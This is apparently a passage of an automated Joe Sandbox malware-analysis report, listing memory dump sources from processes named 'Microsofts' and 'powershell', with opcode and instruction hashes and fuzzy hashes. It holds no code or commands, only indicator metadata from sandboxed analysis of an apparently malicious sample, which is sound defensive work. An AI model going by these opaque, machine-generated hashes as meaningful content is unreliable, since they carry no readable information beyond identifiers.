Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a5d000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8732cee1f963816c9d23aebefc0ccf385514f57172e2c8e25c43fbc241813b24
• Instruction ID: e6b8ee15663e46cc7f456fd2ba0f729cac42d52f6535f5e4a0611c13f888d53e
• Opcode Fuzzy Hash: 8732cee1f963816c9d23aebefc0ccf385514f57172e2c8e25c43fbc241813b24
• Instruction Fuzzy Hash: F8214B715093C49FCB13CF24D990711BF71AB46214F29C5DAD8898F2A7C33A980ACB62

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a60ec3d851d8e26e266133493fdf365c054caf06d66aafb4da8c4f50b742628
• Instruction ID: abd5fbcf62e57fb0b795e69f7ec0e5fcfa981f295ee1ca832c39e194bac986c3
• Opcode Fuzzy Hash: 8a60ec3d851d8e26e266133493fdf365c054caf06d66aafb4da8c4f50b742628
• Instruction Fuzzy Hash: 0C212438E09248CFCB25DFA8D8946ECBBB2EF89300F20906AD809AB255D7349845CF50

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c300067063245cf8241a343e5cf889a432e491c2dcd20dc831b98530a18bef5
• Instruction ID: cb9cd3e6c63a4fc67f7368cd585cc2a85da7c5efd94e8bda5ddf23383519e411
• Opcode Fuzzy Hash: 4c300067063245cf8241a343e5cf889a432e491c2dcd20dc831b98530a18bef5
• Instruction Fuzzy Hash: 11216875E102089FDB08EFB9D4507FEBBB2FB89305F2084A994149B395DBB49A45CF41

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d1987f0b5d552f14855ac3469b8f813c9a1b5aacd2bd30ea920799d357185dd1
• Instruction ID: 68cf5a9e890ef2c786f8149fe81e3ab6f0237f8fad69699d53c04c7cc618a8a0
• Opcode Fuzzy Hash: d1987f0b5d552f14855ac3469b8f813c9a1b5aacd2bd30ea920799d357185dd1
• Instruction Fuzzy Hash: 0F21E471D0925A8FCB01DFA9D8A45EDBFF0BF0A304F1445AAD405B7261EB344A85CBA1

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7bbace223e5c07b6ae12928d06b939f1675eb90e6e5cd402bab07814ad11912a
• Instruction ID: 2d2c2e7725a6637007b52cb840933443563f84110e8bb34ef836e0b3ce40a2d2
• Opcode Fuzzy Hash: 7bbace223e5c07b6ae12928d06b939f1675eb90e6e5cd402bab07814ad11912a
• Instruction Fuzzy Hash: DC115176300104CFD724DB69D994E66B7E6FF99721B2180A9E24ACB364CBB1EC04CB50

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c72e36e1c0806f2d42c2b7d1a7446891e2e8a228bc91c9936aa746a1faeb2e85
• Instruction ID: ef11c0820dcdbe7127d5badd5f05f44f2cc77e7006b9c58a50210f1b94f1a445
• Opcode Fuzzy Hash: c72e36e1c0806f2d42c2b7d1a7446891e2e8a228bc91c9936aa746a1faeb2e85
• Instruction Fuzzy Hash: 27019A32B012418FDB14ABB98D586BEB6EBAF85260715457AD906CB365FFB0CC018B90

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 51559350f35809c4d8ca163164517e694ebc1a92adaed676740479d218e36088
• Instruction ID: 5082ff6301fa4f29e9d33ea6d491ae9892dce1572838c0289f88f36c748bfabe
• Opcode Fuzzy Hash: 51559350f35809c4d8ca163164517e694ebc1a92adaed676740479d218e36088
• Instruction Fuzzy Hash: BA018B32B012558B9714ABBA8C5897EB6EBEE84660311457AD905C7355FFB0CC008A91

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0a01ac64220fcb35a33cb5e8b7ffa10e9f5b24d1e622340e647e99b96db73af5
• Instruction ID: f9f1cdb35402cb70d00c2fa1b28e0ed3dae693daeec24fe6e3bc8a72251cb6ef
• Opcode Fuzzy Hash: 0a01ac64220fcb35a33cb5e8b7ffa10e9f5b24d1e622340e647e99b96db73af5
• Instruction Fuzzy Hash: BE015E75E002099FDF54DFA9D8486EE7BB5FB88310F40482AE91A97241DB749E10CBA1

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 31ebf0c2300fe62d57fcb6cd93acea76e6b11e6b5cf9ef00b1e1b601f0d4d423
• Instruction ID: 1883bc331acf1d7cab6e277d14ccfcd23f33c87e49480b382c50cfd19c397c42
• Opcode Fuzzy Hash: 31ebf0c2300fe62d57fcb6cd93acea76e6b11e6b5cf9ef00b1e1b601f0d4d423
• Instruction Fuzzy Hash: A9011A76700100CFD724DB69DA94FA6B7E6EF99721F2584A9E14A8B364CBF0EC04CB10

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b14d304974012f1c025fed88a7c28763a7eae19ca874d93f3b11be320e0b9ada
• Instruction ID: 0acf101b9ce37fa1badd99fa87c85c167ea727aa8ee01edbe3187864bed31710
• Opcode Fuzzy Hash: b14d304974012f1c025fed88a7c28763a7eae19ca874d93f3b11be320e0b9ada
• Instruction Fuzzy Hash: 4A01B131E0020A9FCB20DFA8D8449EE7BB1FF88320F11452AE959D7651CB308E10CBA2

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cf01ee1c11921ed9ec477828a1d81f048fa0d11d998cbe1ea2f8542d3a20e834
• Instruction ID: 6d181f8cea159809364fd81e3f9ea641be7c26f80efe2e49234ce669a62db19c
• Opcode Fuzzy Hash: cf01ee1c11921ed9ec477828a1d81f048fa0d11d998cbe1ea2f8542d3a20e834
• Instruction Fuzzy Hash: F1F02D357083444FCB152774581847E7F96EBC6320715409BE54ACB3A2DE798C12D751

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b69c2fc2e788b98f26920a83e8a87e1bd6d97655aa64ea3204077a1795a68aeb
• Instruction ID: 6a246d6c94214a3c896d02f6b82243cae9a912758ecc099c7d4fa9b9dc4775cd
• Opcode Fuzzy Hash: b69c2fc2e788b98f26920a83e8a87e1bd6d97655aa64ea3204077a1795a68aeb
• Instruction Fuzzy Hash: 6FF0A7327005155BCB19966EE4149AEBBE9EFC573171440BBF509EB351CFB1DC028790

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: da34b401d8ec63c0cbfacccd062268b9142730599ac0299a967db611c1ecaf81
• Instruction ID: f5033c22c1c8f6e3c1fb1de73a00eecd33f815ae501d411759dd6275265260f1
• Opcode Fuzzy Hash: da34b401d8ec63c0cbfacccd062268b9142730599ac0299a967db611c1ecaf81
• Instruction Fuzzy Hash: E9F02472A001099FCB50DFBD98809EFBBF1FB88350B00463AD205D3601E7B096038BA0

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 097a6b78381e9ef6b55af74d416fd02f50d75040d0d43cc378aae96e64f3eb91
• Instruction ID: 40aea7ef77eda4ec37fa61f2867aac9c598764176475b3580c8a99a90b5267ec
• Opcode Fuzzy Hash: 097a6b78381e9ef6b55af74d416fd02f50d75040d0d43cc378aae96e64f3eb91
• Instruction Fuzzy Hash: 63F08271A002089F8B50DFAD98409EFBBF5FB88350B10452AD609D3201E7709A118BE1

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4744504d43b1e9b08bd19c8e88a30436bd6a657a9ae941d6f6c105f5a4c8ab95
• Instruction ID: 8f13a1123200bd8d14bba090ea2bb2606b65b8f4f3b46263480fc4fdb0659703
• Opcode Fuzzy Hash: 4744504d43b1e9b08bd19c8e88a30436bd6a657a9ae941d6f6c105f5a4c8ab95
• Instruction Fuzzy Hash: 99F0C271865B928FD711ABB0ACBC2AEBB71FF0B317B492D45E40A92432DB702456CF14

Memory Dump Source
• Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0d9d082e60c604842200a1aa9edb80b4f35a84f06765fda4a7e7248d0f5c52bb
• Instruction ID: 545b9222fc2924b2e7f1ab26101967adc7ae607a969a30f8546c78ffb9dcc08b
                                                                                                                                      • Opcode Fuzzy Hash: 0d9d082e60c604842200a1aa9edb80b4f35a84f06765fda4a7e7248d0f5c52bb
                                                                                                                                      • Instruction Fuzzy Hash: 02E00275861B468BE610ABB0ADBC67E7B65FB0B327B842D40A01E81432AF705446CE55
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f3c1632e6e8e5490016ebcde53a1e68fedce1c124570030d69f7afdb4c7438ab
                                                                                                                                      • Instruction ID: c0ab671cbb6fda78e29d8f471cef1ecb7d1f516a73abdfc0fdff48a0e4af3afd
                                                                                                                                      • Opcode Fuzzy Hash: f3c1632e6e8e5490016ebcde53a1e68fedce1c124570030d69f7afdb4c7438ab
                                                                                                                                      • Instruction Fuzzy Hash: CAE07D3BD202675BCB11DBB0FC006EEB730AFE1220F564226D81933140F770154ECAA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b48508cd4763d4417c6939cc05c0b1475b4aa37739415f057ea708f8cb4ca880
                                                                                                                                      • Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
                                                                                                                                      • Opcode Fuzzy Hash: b48508cd4763d4417c6939cc05c0b1475b4aa37739415f057ea708f8cb4ca880
                                                                                                                                      • Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 580c51bbea2488c4f8666e598297a357183c0589ae9bd63984ce8ac3637a9dc8
                                                                                                                                      • Instruction ID: a09908c3fd26e8fa82942b3767140e254b83552f5f5457143dabd42cce182767
                                                                                                                                      • Opcode Fuzzy Hash: 580c51bbea2488c4f8666e598297a357183c0589ae9bd63984ce8ac3637a9dc8
                                                                                                                                      • Instruction Fuzzy Hash: F8D02B6210828547CB057B605A01A7A3F114B03102F4603DE98488F863D761441D8341
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 17d9cd600fbbe0725593d3f63b9c222f97258eb3cd50c93f1a3b52d65f689dec
                                                                                                                                      • Instruction ID: caae83fb84780e34ab0381aa00aeef843496f79f040202c8601f61e162e50f5d
                                                                                                                                      • Opcode Fuzzy Hash: 17d9cd600fbbe0725593d3f63b9c222f97258eb3cd50c93f1a3b52d65f689dec
                                                                                                                                      • Instruction Fuzzy Hash: 52B092CB80DEC45FD32602241921084AFA1A862200B8A04DFC48091243F60816068306
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: {Y{r^$Y{r^
                                                                                                                                      • API String ID: 0-2785191563
                                                                                                                                      • Opcode ID: 08ca1cf9b97fcf5720bee270c89a1d3897df10310ed3d95514031ac98f156dc6
                                                                                                                                      • Instruction ID: 98847c769b3b8b0acc03e951de68b25654407b9d5f46719e98f83d813952aaaf
                                                                                                                                      • Opcode Fuzzy Hash: 08ca1cf9b97fcf5720bee270c89a1d3897df10310ed3d95514031ac98f156dc6
                                                                                                                                      • Instruction Fuzzy Hash: F5917171F016559BDB29EFB588116AE7BE3EF84700B40C92DD10AAB340EF746E058BD5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +/{r^
                                                                                                                                      • API String ID: 0-3364197901
                                                                                                                                      • Opcode ID: e3e75645b8241dc8a2169505869e78b39a256c0ee5f3a20e562f662708c14290
                                                                                                                                      • Instruction ID: 8c534d647d0fa44e6b1956ad45b240b56b8c0d0917757aac2097af71c1bc94c3
                                                                                                                                      • Opcode Fuzzy Hash: e3e75645b8241dc8a2169505869e78b39a256c0ee5f3a20e562f662708c14290
                                                                                                                                      • Instruction Fuzzy Hash: 72E0923270565057C729926EF8119AF7B9FCFC9275711442EE1198B341DE5C9C0187F5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +/{r^
                                                                                                                                      • API String ID: 0-3364197901
                                                                                                                                      • Opcode ID: e17cc797150ad9c212c072b0c08c875f4744a302aa604ae7db39d8376a930a10
                                                                                                                                      • Instruction ID: 1ee834e053c51974daf649b86334a622256794261176ae94b66fa93ed33c6eec
                                                                                                                                      • Opcode Fuzzy Hash: e17cc797150ad9c212c072b0c08c875f4744a302aa604ae7db39d8376a930a10
                                                                                                                                      • Instruction Fuzzy Hash: 2CE0C231700A11578225A76EB81089F77EBDEC9771320443EE119CB300DE6CDD0187E5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2622288050.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_6f70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 306cd5a2e56fe3c6263b18c76beb9cfb91cfa8ef5a80481b8c01bc13173da3d2
                                                                                                                                      • Instruction ID: ef6041515f55fdc9e900e1b6286c6f290ea82e742912a6820441f082d4a49a44
                                                                                                                                      • Opcode Fuzzy Hash: 306cd5a2e56fe3c6263b18c76beb9cfb91cfa8ef5a80481b8c01bc13173da3d2
                                                                                                                                      • Instruction Fuzzy Hash: 90022572F00205DFD7699B689811BABBBF29F92210F2480BBD545CB291DF35DC51C7A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2622288050.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_6f70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9fe4b04e00c21f2af93d80b16d604d3c71b2728ddefd645c9acf355827e43aa0
                                                                                                                                      • Instruction ID: f5cc73dd5bb44f402ebecdd5c2b26def11f13e5f9fa8e17d2217e8c519b9b7f3
                                                                                                                                      • Opcode Fuzzy Hash: 9fe4b04e00c21f2af93d80b16d604d3c71b2728ddefd645c9acf355827e43aa0
                                                                                                                                      • Instruction Fuzzy Hash: E4B11932F00205DFE7659F68C8517AABBF2AF89211F14807BD505DB292DB35DE41C7A1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f04d9bf263fa5d30fa45054ecea0ba3500021af34a4dc5a338fe3dd7ad5dc344
                                                                                                                                      • Instruction ID: 620280bcf89b09037e93ecb8d7280175ebbae0b081f536a7ab26cda8f006a4de
                                                                                                                                      • Opcode Fuzzy Hash: f04d9bf263fa5d30fa45054ecea0ba3500021af34a4dc5a338fe3dd7ad5dc344
                                                                                                                                      • Instruction Fuzzy Hash: 9891CF70A01245CFCB15CF59C484AAEFBB5FF88310B248669D915AB366D739FC52CBA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1a51a0348e7c8714bf9af1cc8979e29739854ee6c9c618e5ecb7302a816d9c72
                                                                                                                                      • Instruction ID: ee19e4b04bc8789a59d370c3dad36dd5d22af7fa57b05de5fe0886c45f8ef48d
                                                                                                                                      • Opcode Fuzzy Hash: 1a51a0348e7c8714bf9af1cc8979e29739854ee6c9c618e5ecb7302a816d9c72
                                                                                                                                      • Instruction Fuzzy Hash: 4C5129B0A092C49FEB01DB68D855BEE7BB2EF85300F1540BAD104DF297DA3D6D018BA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7ea84ab192fbda4289765839e54a5236e7bf0b6a0a6ba09a7934bb6453f8259d
                                                                                                                                      • Instruction ID: 4f077b2888064b3087a2a3875fd4dc69bad5ab415f64cd7fa7e57c8d43e8df7c
                                                                                                                                      • Opcode Fuzzy Hash: 7ea84ab192fbda4289765839e54a5236e7bf0b6a0a6ba09a7934bb6453f8259d
                                                                                                                                      • Instruction Fuzzy Hash: DB6128B1E01248DFDB54DFA9D484A9DBBF1EF88310F248129E809AB365EB349D41CB60
                                                                                                                                      Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a8638c033094109e54419488ce5359652c3f4ab079e9ff87bcbf61bb1c8af813
• Instruction ID: 18bd42d7d361da57ec8042865657d031439a0d00474b5bd397b05b91f1616fb0
• Opcode Fuzzy Hash: a8638c033094109e54419488ce5359652c3f4ab079e9ff87bcbf61bb1c8af813
• Instruction Fuzzy Hash: 49513971E01248DFDB54DFA9D484A9EBFF1EF88310F248069E909AB365DB349D45CB60
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb6f7bb9c67d4d65598f1a505474c3172da0b2cdc62af969068924c9118dbaa4
• Instruction ID: ddf9c027417d21c60a925c2341cbd9deedac46050973340c0e47b018e4882e2a
• Opcode Fuzzy Hash: bb6f7bb9c67d4d65598f1a505474c3172da0b2cdc62af969068924c9118dbaa4
• Instruction Fuzzy Hash: 5C414D74B052448FDB19CB69C468AAEBBF2EF8D310F148058E406EB391DB359C01CB60
Memory Dump Source
• Source File: 0000000E.00000002.2622288050.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5680afa7eae90c6da6ac040d0423cff54c59ec7c41a03647f5b903b3ea63ff82
• Instruction ID: 30e6535fb0f4d2ce95905f11f8941e8f773d73110e8c21c2ace26fac83694d25
• Opcode Fuzzy Hash: 5680afa7eae90c6da6ac040d0423cff54c59ec7c41a03647f5b903b3ea63ff82
• Instruction Fuzzy Hash: 51311273E00209EFDBA88F248541FBBB7A3AF80640F24806AD9059F251DB35ED45D7B6
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e7fc3bbe632704aae6a926be9511fddf8a8875700f86a880cc23cfcfbd58ff11
• Instruction ID: e585a274c926dbd123b36bc257fbd664f28dc36366ba17b2830ca486b3d16e41
• Opcode Fuzzy Hash: e7fc3bbe632704aae6a926be9511fddf8a8875700f86a880cc23cfcfbd58ff11
• Instruction Fuzzy Hash: 51416AB0A01105CFCB05CF59C1989AEFBB5FF48310B258269C915AB365D73AFC52CBA0
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d27b445cf1f31a1c525786ac1f1a52348c2db376c42c5ffe2848259dd71a538d
• Instruction ID: 1aa1fca90cc93bc122679c9f99ddcce8b65d33fec11ffcb7ce23d5f130f7435e
• Opcode Fuzzy Hash: d27b445cf1f31a1c525786ac1f1a52348c2db376c42c5ffe2848259dd71a538d
• Instruction Fuzzy Hash: F2319C353002019FD709EB79E854B9AB7A6EFC9314F108129E609CB391DF74A905CB91
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 69fdefeda69ba2c594d9eb7806e7ab81d3e398eb1a259faebb217f9848b6d16d
• Instruction ID: a42538a03307b9cfc86c569355f3a13dd4243efd1f6273e26aaddf90550ca5e6
• Opcode Fuzzy Hash: 69fdefeda69ba2c594d9eb7806e7ab81d3e398eb1a259faebb217f9848b6d16d
• Instruction Fuzzy Hash: DE31A0307092859FD319DB76D858B2A77E6EB98315F258869D409CB352EB39EC01CB90
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a18b4447786bd7e3ee9ab75ca842cfe4f9210f7e7dfa2627e06658305054401
• Instruction ID: 148ac9952599653c8a27a1d9838eff3b86de25451ed1c42bd692c7f915a4269b
• Opcode Fuzzy Hash: 8a18b4447786bd7e3ee9ab75ca842cfe4f9210f7e7dfa2627e06658305054401
• Instruction Fuzzy Hash: 10314F71E01249DFDB44DF6AD495BAE7BF6EF88310F148069E505EB350EB389C418B52
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9d6813470c3b9997852af2cb0d7b2164f6a8cc8e71b27f96415de76bdd581181
• Instruction ID: 1d5f77f00f245d8ac0a31ca701d7a780d9608f3febf3ce344f445b631d926e83
• Opcode Fuzzy Hash: 9d6813470c3b9997852af2cb0d7b2164f6a8cc8e71b27f96415de76bdd581181
• Instruction Fuzzy Hash: E2315E70E01249AFDB44DF6AC4957AEBBF6AF88300F148069E405EB350EB389C018B92
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ebf194f902265020451a0e3dce63cbb275f747b80b1d803a45489f5fdd21fab2
